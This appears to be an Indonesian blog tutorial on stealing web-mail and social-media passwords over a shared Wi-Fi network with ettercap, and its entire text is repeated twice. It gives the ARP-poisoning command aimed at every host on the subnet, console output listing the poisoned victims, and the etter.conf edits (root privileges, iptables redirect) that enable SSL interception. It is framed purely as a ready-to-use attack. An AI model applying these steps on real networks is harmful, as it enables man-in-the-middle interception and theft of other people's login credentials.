sekarang udah ga usah pake script segala untuk sniffing password https seperti gmail, yahoo, facebook dll
cukup dengan menjalankan ettercap saja
Code:
root@bt:~# ettercap -T -q -M arp -i wlan0 // //
begini hasilnya??
==>>
root@bt:~# ettercap -T -q -M arp -i wlan0 // //
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on wlan0... (Ethernet)
wlan0 -> 00:22:FA:20:B3:8E 172.16.40.251 255.255.255.0
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %
254 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : ANY (all the hosts in the list)
GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
DHCP: [1C:65:9D:26:C1:31] REQUEST 172.16.40.65
DHCP: [00:17:C4C:C33] REQUEST 172.16.40.217
DHCP: [00:1F:3C:A0:8F:4E] DISCOVER
DHCP: [00:1F:3C:A0:8F:4E] DISCOVER
DHCP: [00:1F:3C:A0:8F:4E] DISCOVER
DHCP: [00:1F:3C:A0:8F:4E] REQUEST 172.16.40.248
DHCP: [84:A8:E4:462:3B] DISCOVER
DHCP: [172.16.40.1] OFFER : 172.16.40.245 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1
DHCP: [172.16.40.1] ACK : 172.16.40.245 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1
DHCP: [84:A8:E4:462:3B] REQUEST 172.16.40.245
DHCP: [68:A3:C4:26:77:C7] REQUEST 172.16.40.140
DHCP: [00:21:00:74:21:49] REQUEST 172.16.40.113
DHCP: [172.16.40.1] ACK : 172.16.40.113 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1
DHCP: [68:A3:C4:26:77:C7] REQUEST 172.16.40.140
yang saya warnain biru itu harus diedit om biar jadi 0
caranya:
root@bt:~# nano /etc/etter.conf
Code:
############################################################################
# #
# ettercap -- etter.conf -- configuration file #
# #
# Copyright (C) ALoR & NaGA #
# #
# This program is free software; you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation; either version 2 of the License, or #
# (at your option) any later version. #
# #
# $Id: etter.conf,v 1.78 2004/10/12 15:28:38 alor Exp $ #
# #
############################################################################
[privs]
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default
#####################################
# redir_command_on/off
#####################################
#---------------
# Linux
#---------------
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#---------------
silahkan edit ettercapnya seperti diatas lalu save.
cukup dengan menjalankan ettercap saja
Code:
root@bt:~# ettercap -T -q -M arp -i wlan0 // //
begini hasilnya??
==>>
root@bt:~# ettercap -T -q -M arp -i wlan0 // //
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on wlan0... (Ethernet)
wlan0 -> 00:22:FA:20:B3:8E 172.16.40.251 255.255.255.0
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %
254 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : ANY (all the hosts in the list)
GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
DHCP: [1C:65:9D:26:C1:31] REQUEST 172.16.40.65
DHCP: [00:17:C4C:C33] REQUEST 172.16.40.217
DHCP: [00:1F:3C:A0:8F:4E] DISCOVER
DHCP: [00:1F:3C:A0:8F:4E] DISCOVER
DHCP: [00:1F:3C:A0:8F:4E] DISCOVER
DHCP: [00:1F:3C:A0:8F:4E] REQUEST 172.16.40.248
DHCP: [84:A8:E4:462:3B] DISCOVER
DHCP: [172.16.40.1] OFFER : 172.16.40.245 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1
DHCP: [172.16.40.1] ACK : 172.16.40.245 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1
DHCP: [84:A8:E4:462:3B] REQUEST 172.16.40.245
DHCP: [68:A3:C4:26:77:C7] REQUEST 172.16.40.140
DHCP: [00:21:00:74:21:49] REQUEST 172.16.40.113
DHCP: [172.16.40.1] ACK : 172.16.40.113 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1
DHCP: [68:A3:C4:26:77:C7] REQUEST 172.16.40.140
yang saya warnain biru itu harus diedit om biar jadi 0
caranya:
root@bt:~# nano /etc/etter.conf
Code:
############################################################################
# #
# ettercap -- etter.conf -- configuration file #
# #
# Copyright (C) ALoR & NaGA #
# #
# This program is free software; you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation; either version 2 of the License, or #
# (at your option) any later version. #
# #
# $Id: etter.conf,v 1.78 2004/10/12 15:28:38 alor Exp $ #
# #
############################################################################
[privs]
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default
#####################################
# redir_command_on/off
#####################################
#---------------
# Linux
#---------------
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#---------------
silahkan edit ettercapnya seperti diatas lalu save.
0 komentar:
Posting Komentar